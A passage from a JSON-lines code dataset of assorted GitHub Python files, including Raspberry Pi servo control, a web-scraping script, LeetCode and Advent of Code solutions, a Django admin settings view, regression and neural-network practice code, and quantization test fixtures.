main()\n","repo_name":"deep0892/Algorithms_Practice","sub_path":"Leetcode/algorithms-questions/846_Hand_Of_Straights.py","file_name":"846_Hand_Of_Straights.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74547795895","text":"import RPi.GPIO as GPIO\r\nimport time\r\n\r\nclass CarControl():\r\n def __init__(self):\r\n self.direction_servo_pin=18 # pwm pin on raspberry pi (BCM mode)\r\n self.direction_servo_delay=0.2 # a delay of 200 ms to be able to take a full turn\r\n self.direction_lmax=35 # min of 33% duty_cycle\r\n self.direction_rmax=65 # max of 65% duty cycle\r\n self.direction_center=50\r\n self.direction_stop=0\r\n self.pwm_freq=333 #setting it to 333Hz 50% dudty cycle will be 1.5mv\r\n GPIO.setmode(GPIO.BCM)\r\n GPIO.setup(self.direction_servo_pin, GPIO.OUT)\r\n GPIO.output(self.direction_servo_pin,0)\r\n self.pwm = GPIO.PWM(self.direction_servo_pin, self.pwm_freq )\r\n self.pwm.start(0) #starting with 0 degrees / straight\r\n self.trim = 0\r\n\r\n\r\n def steer_to_angle(self, steer_index):\r\n if steer_index <= 0:\r\n steer_index = max(steer_index+self.direction_center,self.direction_lmax)\r\n else:\r\n steer_index = min(steer_index+self.direction_center,self.direction_rmax)\r\n self.steer_angle = self.trim+steer_index\r\n self.pwm.ChangeDutyCycle(self.steer_angle)\r\n time.sleep(self.direction_servo_delay)\r\n self.pwm.ChangeDutyCycle(self.direction_stop)\r\n\r\n\r\n def steer_right(self,angle):\r\n if angle>30 or angle<0 :\r\n print(\"Angle should range from 0-30 0 neing the center of the \")\r\n self.steer_to_angle(angle//2)\r\n return\r\n def steer_left(self,angle):\r\n if angle>30 or angle<0 :\r\n print(\"Angle should range from 0-30 0 neing the center of the \")\r\n self.steer_to_angle(-1* angle//2)\r\n return\r\n","repo_name":"cyndwith/DeepPI","sub_path":"speechPI/movement_control.py","file_name":"movement_control.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"29888741048","text":"import os\n\nfrom configparser import ConfigParser\nfrom pathlib import Path\nfrom typing import Any, Dict\n\n\nclass ApplicationSettings(object):\n \"\"\"\n Файл доступа к настройкам приложения.\n \"\"\"\n\n __config_file_name = 'HttpServ.conf'\n\n def __new__(cls):\n # в конструкторе создаём экземпляр класса лишь один раз\n if not hasattr(cls, '__instance'):\n cls.__instance = super().__new__(cls)\n\n return cls.__instance\n\n def __init__(self):\n self.__config = ConfigParser()\n\n # создаём файл настроек с параметрами по умолчанию, если его ещё нет\n if not os.path.exists(self.__local_config_path()):\n self.__create_default_local_config()\n\n self.__read_config()\n\n @property\n def adresshost(self) -> str:\n return self.__get_value('General', 'adresshost', 'localhost')\n\n @property\n def porthost(self) -> str:\n return self.__get_value('General', 'porthost', '8080')\n\n\n @property\n def settings(self) -> Dict[str, Any]:\n return {\n 'General/adresshost': self.adresshost,\n 'General/porthost': self.porthost,\n }\n\n def __create_default_local_config(self):\n self.__config['General'] = {}\n self.__config['General']['adresshost'] = 'localhost'\n self.__config['General']['porthost'] = '8080'\n\n\n path = self.__local_config_path()\n basedir = os.path.dirname(path)\n\n if not os.path.exists(basedir):\n os.makedirs(basedir)\n\n with open(path, 'w') as config_file:\n self.__config.write(config_file)\n\n def __read_config(self):\n # парсим ini-файл с настройками\n self.__config.read(self.__local_config_path())\n\n def __get_value(self, section: str, key: str, default_value: Any) -> Any:\n # каждый раз перечитываем файл для горячей смены настроек (не самый эффективный способ)\n self.__read_config()\n\n try:\n return self.__config[section][key]\n except KeyError:\n return default_value\n\n @staticmethod\n def __home_directory() -> Path:\n return Path.expanduser(Path('~'))\n\n @classmethod\n def __local_config_path(cls) -> Path:\n return Path(__file__).parent.joinpath('.config', cls.__config_file_name)\n\n\napplication_settings = ApplicationSettings()\n","repo_name":"PopovVasiliy/mainProject","sub_path":"HTTPServProgect/ApplicationSettings.py","file_name":"ApplicationSettings.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25181531474","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport pyautogui as pg\nimport pyperclip as pc\nimport time as t\n\nruta_driver = \"C:\\\\Program Files (x86)\\\\chromedriver83.exe\"\nurl_base = \"https://www.bvl.com.pe/mercempresas.html\"\n\nbrowser = webdriver.Chrome(ruta_driver)\nbrowser.get(url_base)\n\nt.sleep(3)\npg.hotkey('winleft', 'left')\nt.sleep(2)\npg.press('esc')\nt.sleep(1)\npg.hotkey('ctrl', 'shift', 'i')\nt.sleep(3)\nfor i in range(3):\n pg.press('up')\npg.hotkey('shift', 'f10')\nt.sleep(3)\nfor i in range(5):\n pg.press('down')\npg.press('right')\nfor i in range(2):\n pg.press('down')\npg.press('enter')\npg.hotkey('ctrl', 'shift', 'i')\nhtml = pc.paste()\nsoup = BeautifulSoup(html, \"lxml\") # soup es el objeto, lmxl es el parser\nwith open('html.html', \"wb\") as file:\n file.write(soup.prettify(\"utf-8\"))\n","repo_name":"Acadecon/EscrapeoBVL","sub_path":"empresasurls.py","file_name":"empresasurls.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"29335195620","text":"# coding=utf-8\n# author huxh\n# time 2020/3/24 10:44 AM\n\n\ndef exchange(nums):\n if not nums:\n return []\n\n l = 0\n r = len(nums) - 1\n while l < r:\n while l < r and nums[l] & 1:\n l += 1\n\n while l < r and not nums[r] & 1:\n r -= 1\n nums[l], nums[r] = nums[r], nums[l]\n return nums\n\ndef exchange2(nums):\n if not nums:\n return []\n\n l = 0\n r = 0\n while r < len(nums):\n if nums[r] & 1:\n nums[r], nums[l] = nums[l], nums[r]\n l += 1\n r += 1\n return nums\n\nif __name__ == '__main__':\n print(exchange2([1,3,4,6,7,9]))","repo_name":"Huxhh/LeetCodePy","sub_path":"jianzhioffer/21Exchange.py","file_name":"21Exchange.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"23914641062","text":"#! /usr/bin/env python3\n\nimport sys\nimport unittest\nfrom natsort import natsorted\nimport utilitiesservice as utils\n\n\nclass TestEnumeration(unittest.TestCase):\n \"\"\"\n This is more of an integration test suite.\n Gets Gene ID, species of interest and target species\n from command line inputs. Runs the first half in Perl and then\n runs the other half in both Perl and Python in order to compare\n final outputs\n \"\"\"\n\n geneid = 'ENSG00000165175'\n species = 'human'\n interestsp = 'rat,dog'\n oligolen = '14'\n\n def test_oligoout(self):\n # Run Shell scripts\n\n # Get orthologs\n\n prog = 'getEnsemblOrthologTranscripts.pl'\n geneid = self.geneid\n species = self.species\n interestsp = self.interestsp\n outf = 'seqAnnotation.csv'\n options = ['-g', geneid, '-s', species, '-l', interestsp, '-o', outf]\n utils.run(prog, options)\n\n # Get transcripts\n\n with open(outf) as f:\n transcripts = [row.split(',')[0] for row in f]\n\n trans = transcripts[1:]\n trans = (',').join(trans)\n\n # Get seqs\n\n prog = 'getSeqForTranscriptIds.pl'\n fastaf = 'sequence.fa'\n exonout = 'exonBoundaries.csv'\n varout = 'variationData.csv'\n\n options = ['-l', trans, '-f', fastaf, '-a', exonout, '-v', varout]\n utils.run(prog, options)\n\n # Run perl script\n\n prog = 'RnaEnumeration.pl'\n target = 'ENST00000378474'\n oligolen = self.oligolen\n outf = 'oligoOut.csv'\n options = ['-p', target, '-l', oligolen, '-f', fastaf, '-o', outf]\n utils.run(prog, options)\n\n # Final CSV file\n\n prog = 'joinOligoAnnotations.pl'\n oligout = outf\n outf = 'outputSummary_.csv'\n options = ['-l', oligout, '-j', exonout, '-v', varout, '-o', outf]\n utils.run(prog, options)\n\n # Now run the python analogous\n\n outfnew = 'new' + oligout\n options = ['-p', target, '-l', oligolen, '-f', fastaf, '-o', outfnew]\n options = ['callBowtieEnumerate'] + options\n prog = 'RunDesign.py'\n utils.run(prog, options)\n\n outfnewf = 'new' + outf\n options = ['-l', outfnew, '-j', exonout, '-v', varout, '-o', outfnewf]\n options = ['joinOligoOut'] + options\n utils.run(prog, options)\n\n # Get header from test files\n\n [filepl, readpearl] = utils.readAnnotationCsv(oligout)\n [filepy, readpython] = utils.readAnnotationCsv(outfnew)\n rowpl = next(readpearl)\n rowpy = next(readpython)\n\n # Extract indexes of equivalent elements in both headers\n\n indexesh = [rowpl.index(el) for el in rowpy]\n\n # Run the test\n\n self.assertEqual(len(indexesh), len(rowpl))\n\n for rowpl, rowpy in zip(readpearl, readpython):\n values = [rowpl[el] for el in indexesh]\n self.assertListEqual(values, rowpy)\n\n # Flush out\n\n filepl.close()\n filepy.close()\n\n # Get header from test files\n\n [filepl, readpearl] = utils.readAnnotationCsv(outf)\n [filepy, readpython] = utils.readAnnotationCsv(outfnewf)\n rowpl = next(readpearl)\n rowpy = next(readpython)\n\n # Extract indexes of equivalent elements in both headers\n\n indexesh = [rowpl.index(el) for el in rowpy]\n\n # Run the test\n\n self.assertEqual(len(indexesh), len(rowpl))\n\n for rowpl, rowpy in zip(readpearl, readpython):\n values = [rowpl[el] for el in indexesh]\n for idx, (row, value) in enumerate(zip(rowpy, values)):\n if '(' in value:\n value = value.split(') ')\n value = natsorted(value, key=lambda y: y.lower())\n values[idx] = (') ').join(value)\n if '(' in row:\n row = row.split(') ')\n row = natsorted(row, key=lambda y: y.lower())\n rowpy[idx] = (') ').join(value)\n self.assertListEqual(values, rowpy)\n\n # Flush out\n\n filepl.close()\n filepy.close()\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n TestEnumeration.oligolen = sys.argv.pop()\n TestEnumeration.interestsp = sys.argv.pop()\n TestEnumeration.species = sys.argv.pop()\n TestEnumeration.geneid = sys.argv.pop()\n unittest.main()\n","repo_name":"mumingpo/pfred-docker","sub_path":"pfred-django-backend/scripts/pfred/testenumoligout.py","file_name":"testenumoligout.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"20477555434","text":"from django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom onthefly.utils import SUPPORTED_TYPES, convert\n\n\nclass AppSettingsView(TemplateView):\n \"\"\"\n Show current settings\n \"\"\"\n template_name = 'admin/onthefly_settings.html'\n\n def get_context_data(self, *args, **kwargs):\n context = super(AppSettingsView, self).get_context_data(\n *args, **kwargs)\n context.update({\n 'original_settings': sorted(\n settings.get_original_settings_without_onthefly),\n 'onthefly_settings': settings.get_onthefly_settings\n })\n return context\n\n def post(self, request, *args, **kwargs):\n action_type = request.POST.get('actiontype')\n name = request.POST.get('name')\n if action_type == 'add_field':\n original_value = settings.backend.get_value_from_original_settings(\n name)\n if original_value is None:\n messages.error(\n request, 'NoneType objects can not be changed at runtime!')\n elif type(original_value) not in SUPPORTED_TYPES:\n messages.error(\n request,\n '%s is not supported to add ONTHEFLY settings!' % (\n type(original_value)), )\n else:\n settings.backend.add_field(name)\n settings.backend.set_value(name, original_value)\n elif action_type == 'delete_field':\n settings.backend.delete_field(name)\n settings.backend.delete_value(name)\n elif action_type == 'set_value':\n original_value = settings.backend.get_value_from_original_settings(\n name)\n if type(original_value) not in SUPPORTED_TYPES:\n messages.error(\n request,\n '%s is not supported to add ONTHEFLY settings!' % (\n type(original_value)), )\n value = request.POST.get('value')\n converted_value = convert(value, type(original_value))\n if converted_value is None:\n messages.error(\n request,\n 'Original value type is different than current type!')\n else:\n settings.backend.set_value(name, converted_value)\n request.method = 'GET'\n return self.get(request, *args, **kwargs)\n\n\nadmin.site.register_view('onthefly-settings/', 'Onthefly Settings',\n view=AppSettingsView.as_view())\n","repo_name":"baranbartu/onthefly","sub_path":"onthefly/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"2"} +{"seq_id":"27004243174","text":"# SVR\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nclass SVR:\n\n def __init__(self, learning_rate=0.001, lambda_param=0.01, n_iters=1000):\n self.lr = learning_rate\n self.lambda_param = lambda_param\n self.n_iters = n_iters\n self.w = None\n self.b = None\n\n\n def fit(self, X, y):\n n_samples, n_features = X.shape\n self.w = np.zeros(n_features)\n self.b = 0\n for _ in range(self.n_iters):\n for idx, x_i in enumerate(X):\n self.w -= self.lr * (2 * self.lambda_param * self.w - np.dot(x_i, y[idx]))\n self.b -= self.lr * y[idx]\n\n\n def predict(self, X):\n approx = np.dot(X, self.w) - self.b\n return approx\n\n# Importing the dataset\ndataset = pd.read_csv('Position_Salaries.csv')\nX = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, 2].values\n\n# Splitting the dataset into the Training set and Test set\n\"\"\"from sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\"\"\"\n\n\"\"\"\nnote : here feature scaling applied in the dependent variable\n\n\"\"\"\n\n\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc_X = StandardScaler()\nsc_y = StandardScaler()\nX = sc_X.fit_transform(X)\ny = sc_y.fit_transform(y)\n\nmean_value = sum(y)/len(y)\nmax_value = max(y)\n\ny = (y - mean_value)/max_value\n\n\n\"\"\"\nnote : ***\n\n-> import SVR class by a svm library of sklearn \n-> make regressor and call constructor filling the parameter \n1) kernel = 'rbf'\n-> fit the regressor model in the independent and dependent variable\n\n\"\"\"\n\n\"\"\"\n# Fitting SVR to the dataset\nfrom sklearn.svm import SVR\nregressor = SVR(kernel = 'rbf')\nregressor.fit(X, y)\n\"\"\"\n\nregressor = SVR()\nregressor.fit(X, y)\n\n\n\n\n\"\"\"\nnote : To predict the value for a independent varible value in division apply\n-> np.array[value]\n\nnote : \n-> as feature scaling applied in y then y_pred will get feature scaled value\n-> to get actual value apply object.inverse_transform(y_pred)\n\n\"\"\"\n\n\n# Predicting a new result\ny_pred = regressor.predict(np.array[[6.5]])\n\ny = y*max_value + mean_value\n\ny_pred = sc_y.inverse_transform(y_pred)\n\n# Visualising the SVR results\nplt.scatter(X, y, color = 'red')\nplt.plot(X, regressor.predict(X), color = 'blue')\nplt.title('Truth or Bluff (SVR)')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.show()\n\n# Visualising the SVR results (for higher resolution and smoother curve)\nX_grid = np.arange(min(X), max(X), 0.01) # choice of 0.01 instead of 0.1 step because the data is feature scaled\nX_grid = X_grid.reshape((len(X_grid), 1))\nplt.scatter(X, y, color = 'red')\nplt.plot(X_grid, regressor.predict(X_grid), color = 'blue')\nplt.title('Truth or Bluff (SVR)')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.show()","repo_name":"Mohit-007/MACHINE-LEARNING","sub_path":"Part 2 - Regression/Section 7 - Support Vector Regression (SVR)/svr.py","file_name":"svr.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31463125386","text":"# -*- coding: UTF-8 -*-\nimport csv\n\"\"\"\nCSV文件的存储操作\n\"\"\"\n# 1.写入\nwith open('data.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(['id', 'name', 'age'])\n writer.writerow(['10001', 'Mike', 20])\n writer.writerow(['10002', 'Bob', 22])\n writer.writerow(['10003', 'Jordan', 21])\n\n# 同时写入多行\nwith open('data1.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(['id', 'name', 'age'])\n writer.writerows([['1001', 'Mike', 20], ['1002', 'Bob', 23], ['1003', 'Curry', 21]])\n\n# 以字典的形式写入\nwith open('data2.csv', 'w', newline='') as csvfile:\n fieldnames = ['id', 'name', 'age']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerow({'id': '1001', 'name': 'Mike', 'age': 20})\n writer.writerow({'id': '10002', 'name': 'Bob', 'age': 22})\n writer.writerow({'id': '10003', 'name': 'Jordan', 'age': 21})\n# 在原有的数据基础上添加数据\nwith open('data2.csv', 'a', newline='') as csvfile:\n fieldnames = ['id', 'name', 'age']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writerow({'id': 1004, 'name': 'curry', 'age': 234})\n\n# 写入中文字符,解决编码问题\nwith open('data2.csv', 'a', encoding='utf-8', newline='') as csvfile:\n fieldnames = ['id', 'name', 'age']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writerow({'id': 1004, 'name': '王伟', 'age': 24})\n\n# CSV文件的读取\nwith open('data2.csv', 'r', encoding='utf-8', newline='') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n print(row) # 逐行读取\n\nimport pandas as pd\n\n# 使用pandas库读取csv文件\ndf = pd.read_csv('data2.csv')\nprint('pandas库读取csv文件:\\n', df)\n","repo_name":"cdlwhm1217096231/python3_spider","sub_path":"csv_demo.py","file_name":"csv_demo.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"34123559513","text":"from pytest_cases import fixture\nfrom pytest_cases import parametrize\nfrom pytest_cases import set_case_id\nimport torch\nfrom torch import nn\n\nfrom brevitas.nn import QuantConv1d\nfrom brevitas.nn import QuantConv2d\nfrom brevitas.nn import QuantConvTranspose1d\nfrom brevitas.nn import QuantConvTranspose2d\nfrom brevitas.nn import QuantIdentity\nfrom brevitas.nn import QuantLinear\nfrom brevitas.nn import TruncAvgPool2d\nfrom brevitas.quant.fixed_point import Int8ActPerTensorFixedPoint\nfrom brevitas.quant.fixed_point import Int8WeightPerTensorFixedPoint\nfrom brevitas.quant.scaled_int import Int8ActPerTensorFloat\nfrom brevitas.quant.scaled_int import Int8BiasPerTensorFloatInternalScaling\nfrom brevitas.quant.scaled_int import Int8WeightPerTensorFloat\nfrom brevitas.quant.scaled_int import Int32Bias\nfrom brevitas.quant.shifted_scaled_int import ShiftedUint8ActPerTensorFloat\nfrom brevitas.quant.shifted_scaled_int import ShiftedUint8WeightPerTensorFloat\n\nfrom ...conftest import SEED\n\nOUT_CH = 16\nIN_CH = 8\nIN_MEAN = 5\nIN_SCALE = 3\nFEATURES = 5\nKERNEL_SIZE = 3\nTOLERANCE = 1\n\nQUANTIZERS = {\n 'asymmetric_act_float': (Int8WeightPerTensorFloat, ShiftedUint8ActPerTensorFloat),\n 'asymmetric_weight_float': (ShiftedUint8WeightPerTensorFloat, Int8ActPerTensorFloat),\n 'symmetric_float': (Int8WeightPerTensorFloat, Int8ActPerTensorFloat),\n 'symmetric_fixed_point': (Int8WeightPerTensorFixedPoint, Int8ActPerTensorFixedPoint)}\nBIAS_QUANTIZERS = {\n 'bias_external_scale': (Int32Bias,),\n 'bias_internal_scale': (Int8BiasPerTensorFloatInternalScaling,)}\nQUANT_WBIOL_IMPL = [\n QuantLinear, QuantConv1d, QuantConv2d, QuantConvTranspose1d, QuantConvTranspose2d]\nBIT_WIDTHS = [4, 8, 10] # below 8, equal 8, above 8\nBIAS_BIT_WIDTHS = [8, 16, 32]\n\n\n@fixture\n@parametrize('impl', QUANT_WBIOL_IMPL, ids=[f'{c.__name__}' for c in QUANT_WBIOL_IMPL])\ndef quant_module_impl(impl):\n return impl\n\n\n@fixture\n@parametrize('bit_width', BIT_WIDTHS, ids=[f'i{b}' for b in BIT_WIDTHS])\ndef input_bit_width(bit_width):\n return bit_width\n\n\n@fixture\n@parametrize('bit_width', BIT_WIDTHS, ids=[f'i{b}' for b in BIT_WIDTHS])\ndef weight_bit_width(bit_width):\n return bit_width\n\n\n@fixture\n@parametrize('bit_width', BIT_WIDTHS, ids=[f'i{b}' for b in BIT_WIDTHS])\ndef output_bit_width(bit_width):\n return bit_width\n\n\n@fixture\n@parametrize('bit_width', BIAS_BIT_WIDTHS, ids=[f'i{b}' for b in BIAS_BIT_WIDTHS])\ndef bias_bit_width(bit_width):\n return bit_width\n\n\n@fixture\n@parametrize('quantizers', QUANTIZERS.items(), ids=list(QUANTIZERS.keys()))\ndef weight_act_quantizers(quantizers):\n return quantizers\n\n\n@fixture\n@parametrize('quantizer', BIAS_QUANTIZERS.items(), ids=list(BIAS_QUANTIZERS.keys()))\ndef bias_quantizer(quantizer):\n return quantizer\n\n\n@fixture\n@parametrize('per_channel', [True, False])\ndef quant_module(\n quant_module_impl,\n weight_act_quantizers,\n input_bit_width,\n weight_bit_width,\n output_bit_width,\n bias_bit_width,\n bias_quantizer,\n per_channel):\n\n weight_act_quantizers_name, (weight_quant, io_quant) = weight_act_quantizers\n bias_quantizer_name, (bias_quant,) = bias_quantizer # pytest needs an iterable\n\n if quant_module_impl == QuantLinear:\n layer_kwargs = {'in_features': IN_CH, 'out_features': OUT_CH}\n else:\n layer_kwargs = {'in_channels': IN_CH, 'out_channels': OUT_CH, 'kernel_size': KERNEL_SIZE}\n\n class Model(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv = quant_module_impl(\n **layer_kwargs,\n bias=True,\n weight_quant=weight_quant,\n input_quant=io_quant,\n output_quant=io_quant,\n weight_bit_width=weight_bit_width,\n input_bit_width=input_bit_width,\n output_bit_width=output_bit_width,\n bias_bit_width=bias_bit_width,\n weight_scaling_per_output_channel=per_channel,\n bias_quant=bias_quant,\n return_quant_tensor=True)\n self.conv.weight.data.uniform_(-0.01, 0.01)\n\n def forward(self, x):\n return self.conv(x)\n\n torch.random.manual_seed(SEED)\n module = Model()\n yield module\n del module\n","repo_name":"Xilinx/brevitas","sub_path":"tests/brevitas/export/quant_module_fixture.py","file_name":"quant_module_fixture.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":963,"dataset":"github-code","pt":"2"} +{"seq_id":"26759975026","text":"# https://adventofcode.com/2021/day/3\r\nfrom collections import Counter\r\n\r\ndata_in = 'data.txt' # External data file\r\n\r\n\r\ndef load_data(file_in):\r\n \"\"\"Read in data.txt\"\"\"\r\n data = []\r\n with open(file_in) as cur_file:\r\n for line in cur_file.readlines():\r\n data.append(line.rstrip())\r\n return data\r\n\r\n\r\ndef part_one(data):\r\n \"\"\"Solution for the first task.\"\"\"\r\n\r\n gamma_rate = ''\r\n epsilon_rate = ''\r\n\r\n for index in range(len(data[0])):\r\n counts = Counter([x[index] for x in data])\r\n\r\n gamma_rate += str(counts.most_common()[0][0])\r\n epsilon_rate += str(counts.most_common()[-1][0])\r\n\r\n return int(gamma_rate, 2), int(epsilon_rate, 2)\r\n\r\n\r\ndef recursion(data, rating):\r\n \"\"\"Loop the list items bit by bit and on every loop advance\r\n only the values that contain the bit in the specific index.\"\"\"\r\n\r\n for index in range(len(data[0])):\r\n if len(data) > 1:\r\n bits = Counter([x[index] for x in data])\r\n\r\n if rating == 'oxygen':\r\n if len(set(bits.values())) == 1:\r\n val = '1'\r\n else:\r\n val = bits.most_common()[0][0]\r\n else: # co2\r\n if len(set(bits.values())) == 1:\r\n val = '0'\r\n else:\r\n val = bits.most_common()[-1][0]\r\n\r\n data = [x for x in data if x[index] == val]\r\n else:\r\n return data[0]\r\n return data[0]\r\n\r\n\r\ndef part_two(data):\r\n \"\"\"Solution for the 2nd task.\"\"\"\r\n oxygen_rating = recursion(data, 'oxygen')\r\n co2_rating = recursion(data, 'co2')\r\n\r\n return int(oxygen_rating, 2), int(co2_rating, 2)\r\n\r\n\r\ndef main():\r\n \"\"\"Main logic.\"\"\"\r\n data = load_data(data_in)\r\n\r\n gamma, epsilon = part_one(data)\r\n print(f'Answer is {gamma * epsilon}') # 3813416\r\n\r\n oxygen, co2 = part_two(data)\r\n print(f'Answer is {oxygen * co2}') # 2990784\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Viittis/Advent-of-code-2021","sub_path":"d3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22217450220","text":"\"\"\"\nURL: https://leetcode.com/problems/permutations/description/\n\"\"\"\n\n\nclass Solution:\n\n def permute(self, nums: list[int]) -> list[list[int]]:\n\n result = []\n\n def backtrack(current, nums):\n\n if current == len(nums):\n result.append(nums[:])\n return\n\n for i in range(current, len(nums)):\n\n nums[i], nums[current] = nums[current], nums[i]\n backtrack(current + 1, nums)\n nums[i], nums[current] = nums[current], nums[i]\n\n backtrack(0, nums)\n\n return result\n\n\nc = Solution()\n\nnums = [1, 2, 3]\n\nprint(len(c.permute(nums)))","repo_name":"Tricar5/edu_algo","sub_path":"leetcode/backtrack/78_Permutations.py","file_name":"78_Permutations.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29901050452","text":"import serial\nimport cv2\nfrom time import sleep\nfrom math import sqrt,atan2,degrees,sin,cos\n\ndef Targectory_Gen(x1,y1,x2,y2):\n P1 = (x1,y1)\n P2 = (x2,y2)\n delta_x = P2[0]-P1[0]\n delta_y = P2[1]-P1[1]\n r = sqrt(pow(delta_x,2)+pow(delta_y,2))\n \n Theta = atan2(delta_y,delta_x)\n return int(r),int(degrees(Theta))+180, int(r*cos(Theta)) , int(r*sin(Theta))\n\ndef bytesy(integer):\n return divmod(integer, 0x100)\n\n\nser = serial.Serial(\n port = \"COM9\",\n baudrate = 115200,\n timeout=1\n)\n\nser.rts = 0\nsleep(1)\nbyte_start = 0xBD\nbyte_id = 0x40\n\nP1 = (0,0)\nP2 = (50,50)\npose,theta,X,Y = Targectory_Gen(*P1,*P2)\nt = int(pose*154/11)\nprint(\"r =\" + str(pose))\nprint(\"X =\" + str(X))\nprint(\"Y =\" + str(Y))\nprint(\"Theta = \"+str(theta))\nprint(\"time =\"+str(t))\n\npose_highbyte , pose_lowbyte = bytesy(pose)\nt_highbyte , t_lowbyte = bytesy(t)\ntheta_highbyte , theta_lowbyte = bytesy(theta)\ndata = bytearray([byte_start,byte_id,pose_highbyte,pose_lowbyte,t_highbyte,t_lowbyte,theta_highbyte,theta_lowbyte])\n\ncheckSumOrdList = data[1:]\ncheckSumOrdListSum = sum(checkSumOrdList)\nCheckSum = ( ~(checkSumOrdListSum) % 256 ) % 256\ndata.extend(bytes([CheckSum]))\nkuy = [byte_start,byte_id,pose_highbyte,pose_lowbyte,t_highbyte,t_lowbyte,theta_highbyte,theta_lowbyte,CheckSum]\nkuy = \" \".join(str(x) for x in kuy)\nprint(kuy)\nprint(data)\n# ser.write(data)\nsleep(0.2)\n# print(ser.readline())\n# print(ser.readline())\n# print(ser.readline())\n# print(ser.readline())\n# print(ser.readline())\n# print(ser.readline())\n# print(ser.read())\n# while(1):\n# print(ser.readline())\n\n\n# ser.close()\n","repo_name":"aminballoon/flush_bot","sub_path":"Old_Version/Flush_Communication/Serial_Trajectory.py","file_name":"Serial_Trajectory.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17536094327","text":"import numpy as np;\nfrom src import DeepNeuralNetworkStarter as DNNS;\nimport matplotlib.pyplot as plt;\n\ndesent_optimzation_map = {};\ndesent_optimzation_map[0] = \"No_momentum\";\ndesent_optimzation_map[1] = \"Poly\";\ndesent_optimzation_map[2] = \"Nestrov\";\ndesent_optimzation_map[3] = \"Adam\";\ndesent_optimzation_map[4] = \"RMSProp\";\n\n\ndef accuracy(Y_pred, Y_label):\n Y = np.argmax(Y_pred, axis=0)\n correct = 0\n Y_label = Y_label.flatten()\n for i in range(Y_label.size):\n if Y[i] == Y_label[i]:\n correct += 1\n return correct / Y_label.size * 100\n\n\ndef indices_to_one_hot(data, nb_classes):\n \"\"\"Convert an iterable of indices to one-hot encoded labels.\"\"\"\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]\n\n\ndef unison_shuffled_copies(a, b):\n assert len(a) == len(b);\n p = np.random.permutation(len(a));\n return a[p].T, b[p].T;\n\n\ndef getTrainAndValidationAccuracy(train_data_act, train_label_act, validation_data, validation_label, parameters):\n # compute the accuracy for training set, validation set and testing set by predicting them first\n trPred, train_loss = DNNS.classify(train_data_act, parameters, train_label_act);\n vdPred, validation_loss = DNNS.classify(validation_data, parameters, validation_label);\n trAcc = accuracy(trPred, train_label_act);\n valAcc = accuracy(vdPred, validation_label);\n print(\"Accuracy for training set is {0:0.3f} %\".format(trAcc));\n print(\"Accuracy for validation set is {0:0.3f} %\".format(valAcc));\n\n\ndef plotWithCosts(num_iterations, costList, is_batch_comparision=True, net_dims=[], batch_size=5000, total_size=5000):\n # PLOT of costs vs iterations\n # here plot our results where our x axis would be the 1 to no. of iteration with interval of 10\n # y axis would be costs list for training and validation set\n\n presionSize = 1/(total_size/batch_size);\n iterations = [i for i in np.arange(0, num_iterations, presionSize)];\n for key in costList:\n label = \"\";\n if is_batch_comparision:\n label = \"Batch size of \" + str(key);\n presionSize = 1 / (total_size / key);\n iterations = [i for i in np.arange(0, num_iterations, presionSize)];\n else:\n label = desent_optimzation_map[key];\n plt.plot(iterations, costList[key], label=label);\n plt.legend();\n plt.title(\"Training errors for %s dimensions multi layer neurons\" % str(net_dims[:len(net_dims) - 1]));\n 